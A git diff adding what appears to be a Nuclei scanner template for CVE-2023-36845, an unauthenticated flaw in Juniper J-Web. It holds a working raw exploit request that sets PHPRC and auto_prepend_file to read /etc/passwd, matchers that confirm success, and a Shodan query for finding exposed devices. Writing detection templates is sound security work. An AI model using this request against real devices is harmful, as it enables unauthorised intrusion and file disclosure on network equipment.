diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml new file mode 100644 index 00000000000..aea29fd87a1 --- /dev/null +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -0,0 +1,52 @@ +id: CVE-2023-36845 + +info: + name: Juniper J-Web - Remote Code Execution + author: yaser_s + severity: medium + description: | + A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands + reference: + - https://vulncheck.com/blog/juniper-cve-2023-36845 + - https://nvd.nist.gov/vuln/detail/CVE-2023-36845 + - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2023-36845 + cwe-id: CWE-473 + epss-score: 0.00046 + epss-percentile: 0.14237 + cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: juniper + product: junos + shodan-query: title:"Juniper Web Device Manager" + tags: cve,cve2023,rce,unauth,juniper + +http: + - raw: + - | + POST /?PHPRC=/dev/fd/0 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + auto_prepend_file="/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: body + words: + - "Juniper" + + - type: status + status: + - 200